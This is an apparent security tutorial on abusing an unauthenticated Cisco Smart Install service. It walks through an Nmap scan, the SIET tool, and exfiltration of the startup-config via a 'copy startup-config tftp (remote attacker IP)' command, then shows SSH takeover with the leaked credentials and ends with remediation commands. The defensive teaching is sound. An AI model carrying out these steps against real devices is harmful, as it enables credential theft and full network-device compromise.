Cisco Systems Inc. developed a widely used protocol to perform zero touch deployment of new infrastructure. This can include devices such as switches and routers and many other devices running Cisco IOS. This technology is called Smart Install. Smart Install runs on TCP port 4786 and requires no authentication to connect to the remote service. This protocol is very useful for networking professionals for rapid deployment of new infrastructure. One common best practice across the information technology field is to disable unnecessary services or disable these services when no longer needed. However, many network administrators and engineers alike do not disable this service when the deployment is finished. This exposed service can lead to remote, unauthenticated attackers/threat actors to utilize this service and obtain sensitive information such as: the running-config, password hashes or plaintext passwords, and network topology information or even full device takeover.
The following demo demonstrates abusing Smart Install and common tools/techniques seen in modern networks.
We first begin by performing a remote port scan within the network as seen below using a port scanner such as Nmap:
From the following OS fingerprint from Nmap, the remote device appears to be a Cisco device. Let’s confirm if Smart Install is running on this remote device.
From this information, we have reason to believe that this remote device is indeed running Smart Install. How can we confirm that this remote device is indeed running Smart Install?
Many tools have been created for Smart Install exploitation. One common tool is call SIET (Smart Install Exploitation Tool).
Let’s confirm with using SIET if this remote device is indeed running Smart Install:
With the information at hand, we can now confirm that the remote device is indeed running Smart Install. Let’s proceed with exploiting this misconfiguration.
By using SIET, we can obtain the startup-config (configuration of Cisco IOS device in NVRAM vs running-config which is in RAM). This information in the startup-config is plentiful with useful information including, password hashes, local usernames and passwords (plaintext or hashes), and network topology information such as: VLANs, trunk links, etc.
SIET will spin up a TFTP server on the local attacking machine and the device running Smart Install (once exploited), will run: “copy startup-config tftp (remote attacker IP)” the following screenshot demonstrates this:
We can now view the startup-config and view this information:
As seen in the startup-config, we have a local “admin” account with a plaintext password with privilege level 15. Privilege level 15 in Cisco IOS is the equivalent of “root” in Linux or “NT\Authority System” in Windows. From our port scan performed earlier, we noticed that both SSH and Telnet were opened on the remote device. Let’s try and SSH into this Cisco device with this newly obtained information:
As you can see, we have successfully established an SSH connection to the remote device and have fully compromised the device. Let’s confirm this by viewing the Spanning Tree Protocol topology information.
This information confirms that we are now remotely connected to the remote Cisco device and have full device takeover.
Q: How can this attack be prevented in modern networks?
A: This attack can be prevented by performing the following:
- In global configuration mode on your Cisco device, issue the command: “no vstack”
- Confirm that this configuration applied successfully by issuing: “show vstack status”
This is one of the many different attacks that can be performed on Cisco devices and very common in modern networks. The remediation efforts are minimal compared to the recovery efforts in the event this is remotely exploited.
Further Reading:
https://github.com/Sab0tag3d/SIET
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi
